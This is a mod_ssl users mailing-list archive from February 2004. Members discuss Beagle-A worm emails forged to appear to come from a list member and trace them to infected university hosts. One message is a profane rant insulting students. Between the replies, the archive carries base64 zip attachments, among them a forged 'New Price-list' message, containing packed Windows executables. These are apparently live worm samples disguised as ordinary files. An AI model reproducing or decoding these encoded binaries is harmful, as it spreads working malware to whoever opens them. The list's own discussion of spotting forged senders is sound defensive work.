GJiE6g4BdCTSV7wAX13Nalc/GMq/X1VPr3Eyj9c8Fb7w0N7hAVtCEXxAizkK1MQpMKtUG3S0
dcHHjTpit3JdOPw5a+voHnCsIOYUY+052u/FwcIaxEMD6hXFOwGaa1h9UCeba3VnB2YXUwsn
HAzLw6EhbQ7stmxzC3CGPofWA1ATkY2cYR0iCMLCwTs+wS7YQ90CPYXbdamBqU5WO9DobM/J
6mfz6EzZ/6yqAtA69mwP7NZkURQKodcGo2d62tCKDk9bRb7bI65N8gKm+H/qz40k+KgnaDNU
qNDo1gLwAOkmLMVobpvFAvZbqhoRHBLADF0xlVxVXcAuGWSTeGeKhAwLsaFlDo7EsLHCXLf4
EjgAw8zCMuOYJw/sAahnQlUQfAHkJf8BGG6uKQjtUGuUOzTDbhMb0uEFV9oELehtB4vuIrFo
ICiN6N5uYRKA5uUFIfonwwGLylP7AGhxD90BvQhUyqMNiORKrskNallueytyEHpYIE07s34A
xaUCd8hOocDmGLlDLtdUAUEelevZ+7UPTOjlLgomACZ9cLkx3QwB6Hs4CyDktlPUnLQMGIxs
7bcPzP8ltEAwBdDMjIyMjMjEwLyMjIyMuHAsMIyMjIw0ODxAjIyMjERITFCMjIyMVFhcYIyM
jIxkaGzUjIyMjHR4fICMjIyMhIiMkIyMjIyUmJygjIyMjKSorLAZGXmOBEFYSETkaxQZQLUj
OGRkZGQ0MCwkZGRkZCBUKEzP53NkUNxA4ED0QOz5fD6fQOhA8EAUQRhBk5Hn8xBBDEEcGCMj
I2MFCAwQJAkyIyP8AOMHWagoB9am6ZqTSExeA3I8drDBmiweG5IHOkQDTdM0zUpgcoKQoDZN
0zS60ODyDEVpmqZZJDJATlqm6ZquKBt4igOappumaZq2yNDo/A5GNE3TLCA2QExYbJpt02Sc
Q3McAPBDtGmazgPKvKpqRc1Zd1ZTR6tHC5iMBjnbdAOkgkfXtH6m686I9/4X7gO82XTN2dJH
ExYKAyj8RqZpmmbs4tTMwk2zbJqypDJHOiCWd0nRYFNoQXATzWWbAQfPQxOKBHRvQJZBXERD
ExiytcyAeBcTJAPWNAOw6Eg7EjKXbZZIDERCE4TTDMjWBRNgpiTGprlkOEPK/DxCO4IKaV7m
SED8t///GgBDbG9zZUhhbmRsZQAdDW9tcGFyZUZpYreyvVRpbREwDWF0EI5/wBbyMQ1NYXBw
aW5nB7oGdbA7FU11aA9GtlgQQWEPSert/0Nvb2xoZWxwMzJTbjxzaG87trUNlI8tRGSDAJML
kS32FgNyc3RuHZzd/oO1TlUQ3gBHZXRDdXJObnTa39edXUlf3xVElm9ybQbT3R7rN+gRcml2
c3lwN/WI+La/QlNpemf+DUyObcBbSGzigQEPZ2nf1j3mETRTdHLZczc8GVPZtre3eY9lbUSW
ZWN0YHkVUmfdhds6Y2ssdW7DUw9t2H/YZX9VEVpvbmVJbmYX7O7Z2mkLGWJX1G93c1LRFsq2
F2cDYn9QBfsQ4QBuDdlmr8tFbwGsGg2u3284Nhq6AYVWaWV3T2bdAIQIQ8TRAfXqQiHYwi0B
CXBU+GGZK8URVAD3AaE75ogaOgD9C2zGT9jAZHMVAlMzUG+/lWVrrhFyYA1lcABlAskovAkS
4NMqzNC2W4cCVCZtLIlmB2PJFhNpDncC0PAn7FVubbWPAldhaXQ8U2244c11D09iahYAlAIm
RXj9jEK7CgCeCY90ALUCbDTPRrh6cmNluwtweb9gVG6LIG4LlVt3YWFxAmlwcsJmGnW7QIeV
cxcb1kFD8TYKZ7tudXANIff6dG+Gd/8NIwBfXw9GRElzBPkkAGE1Q+vKY2MJJU+8B9ZtHxvN
Y7Nz5msgJw2jFb6F3G61KskP2YY1tFuLYnnzFCsPYWFrxw02ADwOXwVkTsNQNXw6AGxpRW46
B+a2Dah2FQBQbEQJQrBIzURuOWA10HiavQi6hW9UkNqjsRFpBc7vX+0Z71q+Bm1Pbkg8AG9M
LbTuYDHXABtE2QHmutdQ+AlSQ4on8wsCSUtu4ekL+lQmbQuZbDu0sYV3oGk5aYP8tadkB5Yn
exWPbK6IZ/plZLAbhhO2PZKLTocPVexQ6AqjYXcGCGHFfqxjgHdnXEtleQCDDZjhc+/ODj0P
RBYPZ7tdMolW4nVlEaP7Giu1UQlGEEWBrhPcwjLDuRFydtKN7esQ+yoBTgJ3c2wfhcJrUPM0
qXD2cNrSG4ZjVVJMRKRumLWtm9E65EV1vW3t9OhamCG4U8xsoYAF+80wHFNIRUxMYAD/DmIR
KbEGdD4xNTEu/ifh2zIwAzAuMzkhU09GVFdBUkVcBUpfB8BHMjFW2muj9WRheS6ETFwyE7v9
7ccLQVRVUEQERVIuRVhFDVZXDo+ZM4NvDFAKTFVBke3HCoYJRFJXRUIWV7Ib9vZJQ1NTC1BO
VA0MOTXs29gsVQpOC0dSQUQM3y0L2W8mC1RPRE9X2LJtsk4MVDRDGinVPmsfVlhRkEFDRkkd
txH2rFGBTUN2PlRQBSb/7E9TVGhWTFRNQUlfbjgo/XR0cDovL0VNjy51G10bl0Mtbd5uRHJ1
ZdthG+0vc2MGw3AmdwAuDQAFWjRQ/C4tDWFNbC8icAN0NbBWoxfKXkSqUvu/6HM/cD0lZ3Um
aWQGHlK7BJtjzQ2ibm9QJra9hMNkkbtNaTZvbIPEYPBmdFzaXKRWK7UdbJpz91xSrDxJoK7u
bwBsAGZyDW8MAEdgsQYtAEoAaVu7tqVfrF9IZd5cadBsDECNGijGe5Yi/iXEAhADBAUwBscs
+w1s3BIsDXM8WENDOiAAQgVrm1ypAMMJok8gzRzfqsG9UlNFVAZcTAJST006wwr/tjwWPhdD
UFQgwg7aF3YNokEGWyWeTkQlXasILhoVKKm4gGBbbYHzbQw6bghg+DaEAwphdnAuKHMmWq0A
n9G0rBrRwXVbNED+czqwtkC71e5chi4qUWpiBLsh8vJ0eHRodG0SZGJ4BJfNX3NtZGUObmNo
bWZvZIdCa7tzhGZnBEalqgq4gnMEIZFFuPkvE9ZFAGQnLCcgZGQgTRLbBnMgeQNIOkk6m6cC
27cJJTAzaQMy4noSv0OEOhclB1N1hGetxSwMat8JTaG9QRPTYdAtSUQPIS0IP4IjTUlNRS3n
FTV00EzdEhF0/C1qsNEOfBKjbKq7UGg4VIEi6WQ7H98aGmwgAGI/ZBh5PSItzFC2YABRInAP
9jGyNxFP0C/zGlvhhYFuOyAXPnPbsC8s0UDZLRBjaWkiLXBZKhDXG2YtRYnNRaE+Nlo6N7xR
R6lsdF/XbNgcfMgKry9v1xdzo51okVhtw2oMsnZjRg0OLnrXcGjZhi5iTzY0IuRewVTybylb
aDnY3LaFYcBtF1pmYAN7LoRergSyWWjsawMRLhkAa2libKFWQ04gCS0wdaHwVuUXZHfIumzB
XftldhTtcBtXRq01FsRrmH7b68eTo7WKCKeWRNNSa7QyFWA4Y2gouNtKnG55Bf4ZAKh9zZlc
R+3GIOqBhQ7Z32lVNCC+K7RnYnbu1kzhcWaita5ofnQEKV3xBcS62myKuXP3aFvbeiYvbf5q
IKix0EyZwy8U23lzha7NTz1tviDZJSIemdia0WUtaoq1UsM1h1aJ3iJls2Wtswb3CgnWaGLC
IAynb4fTztCH2mYTV0hp7hMQ61q0LgAIgXSelCHXcnMlB+reMyyN10yya8SbH0Nz7RAQWRwK
xiux5t5cbOlWZT8gHQIZgea2CHJzbZ7Yv2Ynw1lKc4UA8s11dPTMC00SaERiU+mvXD5uIHN1
mA2Ep5I9hAtIbJBKOEftdMK+Ch0rtrUmDGgGMyErIscECm1wiTFEEXFqU4lFHF9txywwAWCJ
EMWA////3wYwETAeMCYwLDBGMEwwXDATMR4xJDFONcc14DUi/////zYwNk82LzlJOVQ5ZTmB
OYo5rTm+Occ54DnvOfo5Azoh////5To4Ol06aDqJOqk6yzrvOhw7Lzs+O1c7XDthO/f///+F
O507wDtLPF48aDwvPTk9Qz1IPWs9iD2XPaE9eF8g2CKGWEcLMoYy/////6EyqjK1Mt4y5DLs
MgkzTTOiM9Iz5TPrMxA0/zQYNco1/////+41mzY1N1k3vDfON9o3DjgrOKc4FjmaO7U8vjzd
PMA930Tz/w8+HD5VPqc+9j4DPzgSzzDVMN/////dMO3PQjGBMaYxsTG6Mcsx0DH+MQ8yKDJ0
NH80jP////803zTuNBE1IzU/NXs1yTWsNrc2wDbONtQ25zb5NiE3J3/3//83MDc5N043ZTdw
N5A3qTevN8M3z3/9NyE4YzjZ/3/D/zj1OAA5CzkdOSofxjlQOnk6izqfOq46ATsH/////zsW
O2c7bDtyO307mzupO8M75jv2OwE8Mjw4PD48RDxK//8N/zxQPFY8XDxiGW48dDx6PIA8hjyM
PJI8mDye/////zykPKo8sDy2PLw8wjzIPM481DzaPOA85jzsPPI8+Dz+///W/zwEPQo9ED0W
PRyWPSg9Lj00PTo9QD1GPUw9fotb/FI9WD1ePRpqPSV2PXw9gv///xttjj2UPZo9oD2mPaw9
sj24Pb49xD3KPdA91j1AauH/3D3iPeg97j30PfqPPh1VkbAIDW6ghIL/gAPf/SH/lev+itGK
kNlflYPZ2gctqoLZ0AJ3KDD3B9giIYT3fT68F0Ao95QDnKY0FPcRIBR8NoUwF2KyAGR0ByD3
dAwoBjdAshwgGKhXEAoCSQz3TNkscmgB63rgs9kgFKciECOUJISCBKcRATYI6GTB4L1gCX7P
CSBgwbKldyAhwbIhu2AmOJCmc4EYYVZqqYh2gDArBXZespwQ0hCbKriy3bQXwhALs5ZV8MDB
pAHcKmAjI2HWCNSOBaAJN4vXoupT4Aj+s+tf3YH6sP8W6NOXK+g/ALe7Ox6jZBEJ6yQOHoM9
NncheA2//zUIIBQgAO9txwUKmScCuVQu1V+sEJv4jIsQ3+4wGu8yMRFUBv87MUYxWjFgMQda
p0CI4lxkFfSCZM0IMycuwEix7mRtX2N5VyMVYNQb4ssBxggqOKKIJEVaFoIJjN0YAQUbxSsG
sW5Q3WMvJG5lQRBFeGkUZEDdviD3Ek0OdWxo2VbxyE7rQRM6itmsWBHzQSgHVaAiQEHNDpCA
ATPqQS2b1g7TomZRJwKKTRjUQA7fAZFBjUHLAbJkUMneAbcMeRNCAbMKRgHss2FQjAltcGkK
bhjUO3Cnk3t+SygV0QrkaW8TCnjvUHlDbGFnvUQlO1HjDQZLFvXjAfJ8SVrQVuRB3ExIBGqM
AhgBMAhVsm5SlHRjc7olVEcB0QxvAIkK1qkKhbOwBGoB9u+Z1EigTghyAYFaCLbTEKjTbDam
ADGhOs02F7Kc5dmMGJE5AQuSiGWzyfTMLM8D+QQAQg8BDmCiXECOXhQqA5AvEsS5bwAEoPm6
qE9kOpAD1SFqtwJXqADEkHJyKs4MDkLU965sG/sGxCwPGckS9FQwownJslIYc8wdQtRsAOvE
an8ovpUnG7TGc5IAAAAAAAAAgAQA/wAAAAAAAAAAYL4AgEAAjb4AkP//V4PN/+sQkJCQkJCQ
igZGiAdHAdt1B4seg+78Edty7bgBAAAAAdt1B4seg+78EdsRwAHbc+91CYseg+78Edtz5DHJ
g+gDcg3B4AiKBkaD8P90dInFAdt1B4seg+78EdsRyQHbdQeLHoPu/BHbEcl1IEEB23UHix6D
7vwR2xHJAdtz73UJix6D7vwR23Pkg8ECgf0A8///g9EBjRQvg/38dg+KAkKIB0dJdffpY///
/5CLAoPCBIkHg8cEg+kEd/EBz+lM////Xon3uVsAAACKB0cs6DwBd/eAPwB18osHil8EZsHo
CMHAEIbEKfiA6+gB8IkHg8cFidji2Y2+AJAAAIsHCcB0PItfBI2EMKSzAAAB81CDxwj/lgi0
AACVigdHCMB03In5V0jyrlX/lgy0AAAJwHQHiQODwwTr4f+WELQAAGHpWmL//wAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAwAAACAAAIAOAAAAYAAAgAAAAAAAAAAA
AAAAAAAAAQABAAAAOAAAgAAAAAAAAAAAAAAAAAAAAQAAAAAAUAAAAKTAAADoAgAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAEAAQAAAHgAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAJAAAACQwwAA
FAAAAAAAAAAAAAAAoJAAACgAAAAgAAAAQAAAAAEABAAAAAAAgAIAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAACAAACAAAAAgIAAgAAAAIAAgACAgAAAwMDAAICAgAAAAP8AAP8AAAD//wD/AAAA
/wD/AP//AAD///8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAACHd3d3d3d3d3d3d3cAAAAAj//////////////3AAAAAI//////////////9w
AAAACP/3d3d3d3d3d3f/cAAAAAj/9///f/d3/3d//3AAAAAI//f//3/3d/93f/9wAAAACP/3
d3d393f/d3//cAAAAAj/9///f/d3d3d//3AAAAAI//f//3/3d/93f/9wAAAACP/3d3d393f/
d3//cCgoKCgoKCgof////3d//3CCgoKCgoKCgn//9/////9wKP///////yh3d3d3d3//cIL/
///4KCiCf//3//9//3Ao8oKCgvKCKH//9///f/9wgvgoKC8oL4J3d3d3d3//cCjygoLygo8o
f//3//9//3CC/ygvKCgvgn//9///f/9wKP/y8oKP/yh3d3d3d3//cIL/LygoKP+Cf//3//9/
/3Ao8vKCgoKPKH//9///f/9wgvgoKPgoL4J3d3d3gAAAACjygo//go8o/////4//eACC////
////gv////+P94AAKCgoKCgoKCh3d3//j3gAAIKCgoKCgoKC/////4eAAAAAAAAI////////
//+IAAAAAAAACP//////////gAAAAAAAAAiIiIiIiIiIiIAAAAD///////////4AAAD+AAAA
/gAAAP4AAAD+AAAA/gAAAP4AAAD+AAAA/gAAAP4AAAD+AAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAAMAAAAHAAAAD/4AAB/+AAA/
/gAAf4iTAAAAAAEAAQAgIBAAAQAEAOgCAAABAAAAAAAAAAAAAAAAADDEAAAIxAAAAAAAAAAA
AAAAAAAAPcQAABjEAAAAAAAAAAAAAAAAAABKxAAAIMQAAAAAAAAAAAAAAAAAAFbEAAAoxAAA
AAAAAAAAAAAAAAAAAAAAAAAAAABgxAAAbsQAAH7EAAAAAAAAjMQAAAAAAACaxAAAAAAAAKrE
AAAAAAAAS0VSTkVMMzIuRExMAGFkdmFwaTMyLmRsbABTSEVMTDMyLmRsbAB1c2VyMzIuZGxs
AABMb2FkTGlicmFyeUEAAEdldFByb2NBZGRyZXNzAABFeGl0UHJvY2VzcwAAAFJlZ0Nsb3Nl
S2V5AAAAU2hlbGxFeGVjdXRlQQAAAEZpbmRXaW5kb3dBAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQSwECFAAKAAAAAACgvlsw
Sh/MnQA+AAAAPgAADAAAAAAAAAAAACAAAAAAAAAAcHF2aHh1a2YuZXhlUEsFBgAAAAABAAEA
OgAAACo+AAAAAA==

----------tevtxhppvpgaooykdwvm--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Feb 28 08:08:21 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 9E007A8973; Sat, 28 Feb 2004 08:08:21 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.solcon.nl (mail.solcon.nl [212.45.33.11])
	by master.modssl.org (Postfix) with ESMTP id A310FA8948
	for ; Sat, 28 Feb 2004 08:08:14 +0100 (CET)
Received: from deze.atz.nl (dsl-213-134-248-042.solcon.nl [213.134.248.42])
	by mail.solcon.nl (8.12.10/SQL-8.12.10-1/8.12.5) with ESMTP id i1S788dd030653
	for ; Sat, 28 Feb 2004 08:08:09 +0100
Message-Id: <6.0.0.22.0.20040228074833.05973850@pop.atz.nl>
X-Sender: atz@pop.atz-hosting.nl (Unverified)
X-Mailer: QUALCOMM Windows Eudora Version 6.0.0.22
Date: Sat, 28 Feb 2004 07:57:12 +0100
To: modssl-users@modssl.org
From: "A.T.Z." 
Subject: RE: rse has beagle-a virus ?
In-Reply-To: 
References: <001901c3fd89$b856f7c0$c400a8c0@charon>
 
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
X-AntiVirus: checked by Vexira Milter 1.0.6; VAE 6.24.0.5; VDF 6.24.0.24
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "A.T.Z." 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

At 18:50 27-02-2004 -0500, Dave Paris wrote:
>More likely a faked 'From' address.  While possible, it's highly improbable
>that the source is actually Ralf's machine.  I've routed my copies to
>/dev/null so I can't examine the headers to determine if the source address
>actually resides in Europe or not.

Here you have a few of them. Nothing goes to /dev/null here without me 
looking at it first :)

Those were send to this list:

Received: from cruzeiro (cruzeiro.fisc.wwu.edu [140.160.220.200])
by master.modssl.org (Postfix) with SMTP id 8EBC7A8934

Received: from CLS-TORG1010-24 (torg1010-24.its.vt.edu [128.173.44.188])
by master.modssl.org (Postfix) with SMTP id 245B5A8934

Received: from AdamBroughton (asdl00.ae.gatech.edu [130.207.39.100])
by master.modssl.org (Postfix) with SMTP id 96173A8934

Received: from woofie (A052105.N1.Vanderbilt.Edu [129.59.52.105])
by master.modssl.org (Postfix) with SMTP id 37622A8934

Received: from CLS-TORG1010-30 (torg1010-30.its.vt.edu [128.173.44.194])
by master.modssl.org (Postfix) with SMTP id 7A3C1A8941

Anyone seeing their own IP should at least go to an online scanner like 
http://housecall.trendmicro.com or http://www.symantec.com

Have fun with them..


B. 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Feb 29 14:27:59 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id F0E5BA8976; Sun, 29 Feb 2004 14:27:58 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from gretel.pobox.com (gretel.pobox.com [208.58.1.197])
	by master.modssl.org (Postfix) with ESMTP id B288DA8973
	for ; Sun, 29 Feb 2004 14:27:45 +0100 (CET)
Received: from boggle.pobox.com (boggle.pobox.com [208.58.1.193])
	by gretel.pobox.com (Postfix) with ESMTP id 36D249B0E2
	for ; Sat, 28 Feb 2004 07:25:36 -0500 (EST)
Received: from colander (localhost [127.0.0.1])
	by boggle.pobox.com (Postfix) with ESMTP id 8FE5351613
	for ; Sat, 28 Feb 2004 07:25:05 -0500 (EST)
Received: from jester.pobox.com (jester.pobox.com [64.71.166.114])
	by boggle.pobox.com (Postfix) with ESMTP
	for ; Sat, 28 Feb 2004 07:25:01 -0500 (EST)
Received: from w3works.com (unknown [69.55.70.22])
	by jester.pobox.com (Postfix) with ESMTP id E11EE88
	for ; Sat, 28 Feb 2004 07:25:00 -0500 (EST)
Message-ID: <4040888B.5030000@w3works.com>
Date: Sat, 28 Feb 2004 07:24:43 -0500
From: Dave Paris 
Organization: W3Works, LLC
User-Agent: Mozilla Thunderbird 0.5 (Windows/20040207)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re[2]: rse has beagle-a virus ?
References: <001901c3fd89$b856f7c0$c400a8c0@charon>
In-Reply-To: <001901c3fd89$b856f7c0$c400a8c0@charon>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Dave Paris 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

As I suspected, none of these messages originate from Ralf.  Just 
checking the original headers on the most recent batch of six I got 
overnight...

from cruzeiro (cruzeiro.fisc.wwu.edu [140.160.220.200])	by master.modssl.org
from CLS-TORG1010-27 (torg1010-27.its.vt.edu [128.173.44.191])	by 
master.modssl.org
from CLS-TORG1010-24 (torg1010-24.its.vt.edu [128.173.44.188])	by 
master.modssl.org
from CLS-TORG1010-30 (torg1010-30.its.vt.edu [128.173.44.194])	by 
master.modssl.org
from woofie (A052105.N1.Vanderbilt.Edu [129.59.52.105])	by master.modssl.org
from AdamBroughton (asdl00.ae.gatech.edu [130.207.39.100])	by 
master.modssl.org

What this tells me is that someone realized the .edu addresses on the 
listserv were low hanging fruit.  Nice job.  Try partying less, studying 
more, and figure out how to keep yourself from being infected (on 
multiple fronts).  [aside:  pisses me off that I have to deal with spam 
from cracked/infected boxes from .edu domains ... I think I'm just going 
to reject all .edu-headered mail.  it's a hugely sad commentary that 
people from institutions of *higher* education can't grasp the concept 
of DON'T CLICK ON F^&KING ATTACHMENTS YOU'RE NOT EXPECING and USE A 
F#@KING A/V PACKAGE ALREADY, DAMNIT.  I mean really, people.. you're 
shelling out a TON of money and you don't seem to be one lick smarter 
than Jimmy Joe-Jobber's mom who'll click on everything and anything 
since getting her PC two weeks ago.  If you're as f%$king stupid as you 
appear to be, give it up .. save yourself the money and give your slot 
at school to someone else.  There no shame in doing manual labor for a 
living.  Society needs both ends of the spectrum.  If you can't figure 
out the "don't click" stuff, I have no idea what you're going to do with 
number theory or algorithms (assuming you're in a CS program).  I vote 
to kick the .edu's off the listserv until they prove they've got an 
intellectual agility quotient above that of a small soapdish.  If this 
pisses off admins for .edu's, sorry .. life's a bitch, grab a helmet. 
The rest of us out in the real world have to deal with [l]users like 
this and keep our networks clean for the rest of the planet - you're no 
different... you just have a harder job that I certainly don't envy. 
Perhaps instituting a "three strikes" policy for students .. the first 
infection gets you a warning .. the second gets you booted off the 
school's network .. the third (meaning you violated both the 2nd AND 
1st) gets you booted from school.  Hrmm.. not a bad idea, I suppose. 
Anyway .. rant mode is now OFF.]

Kind-ish Regards,
-dsp :-)
[...]

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Feb 29 20:07:31 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 4A0A3A8977; Sun, 29 Feb 2004 20:07:31 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from CLS-TORG1010-26 (torg1010-26.its.vt.edu [128.173.44.190])
	by master.modssl.org (Postfix) with SMTP id 7C6F9A8973
	for ; Sun, 29 Feb 2004 20:07:18 +0100 (CET)
Date: Sun, 29 Feb 2004 14:07:18 -0500
To: modssl-users@modssl.org
Subject: New Price-list
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------nbgkjqqbkmwbmxvubguw"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------nbgkjqqbkmwbmxvubguw
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit



----------nbgkjqqbkmwbmxvubguw
Content-Type: application/octet-stream; name="dacccbbdbcb.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="aaadbaa.zip"

UEsDBAoAAAAAAABwXTAaxVJJAD4AAAA+AAAMAAAAanNuaGVxbHAuZXhlTVqQAAMAAAAEAAAA
//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2AAAAA4f
ug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0K
JAAAAAAAAADEoj5LgMNQGIDDUBiAw1AYgMNQGIPDUBgO3EMYr8NQGGjcVRiBw1AYfONCGIHD
UBhHxVYYgcNQGFJpY2iAw1AYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUEUAAEwBAwAxtUBA
AAAAAAAAAADgAA8BCwEFDABAAAAAEAAAAHAAALCwAAAAgAAAAMAAAAAAQAAAEAAAAAIAAAQA
AAAAAAAABAAAAAAAAAAA0AAAABAAAAAAAAACAAAAAAAQAAAQAAAAABAAABAAAAAAAAAQAAAA
AAAAAAAAAACkwwAAFAEAAADAAACkAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAABVUFgwAAAAAABwAAAAEAAAAAAAAAAEAAAAAAAAAAAAAAAA
AACAAADgVVBYMQAAAAAAQAAAAIAAAAA0AAAABAAAAAAAAAAAAAAAAAAAQAAA4C5yc3JjAAAA
ABAAAADAAAAABgAAADgAAAAAAAAAAAAAAAAAAEAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAMS4yNABVUFghDAkCCBacehByQoljGZQAAKMwAAAAbgAAJgAAKP/b//9Vi+yDxOhT/3UI
agBoOgQAAOgCDGSJRfyFwA+E/eXbtq8LABkMEqD0agRoABB/2XTtEQkW/AfV+DPbC8B07tnm
vn0S9CwC+BsMiBZ/3WO3VDEwQFNAaA0JUApGko3Lw9rvRfBQMPhSBUsKnexgt+d3MiFq//91
7Hwm6FAL7N0G+zSLXegKEFOAADZpxv6DPQifcRCLw1vJwggA1PQMyBbA05BNGgzJyIH0DPhs
sMjTEvgHEG8jtA82bIHE2P0jRAiI3X1/FyKJhRCDnwczwJIttu1eJMeF3BMkAh+NCdnZXPe9
tSQvUmUvfBj8tnsr3xKUTYud+A/rFDCbstlTWOvNDPX4v3yuYfdqAgMDaL1Ak/0cCze33UB1
BCYMHuz4UKwQti07O8eCzx9TNx/hhttKC2gmHGipgSsBx4vYH2TzbBUGeq6CI9hbw63ZbmN1
8FL8UByAARhwcAu/gEu4x1IEgVkGcw3v7nSOaCNtvpqHbuviKAvwqwEFZA4TnjDmI/926bgL
vda9e7BwM7LJwwYCPbhQR0DFe1l39jWggIs+PAwPANE6n3WfLaL8U1Z+bB4Mpmju/xl7KGms
LoE4LXVwZHQcB7v9/v9kZWx0CkCQgHgDAHXo6w9vrukEBFcJb5CtHWgE4UekTAkhT74JJw6a
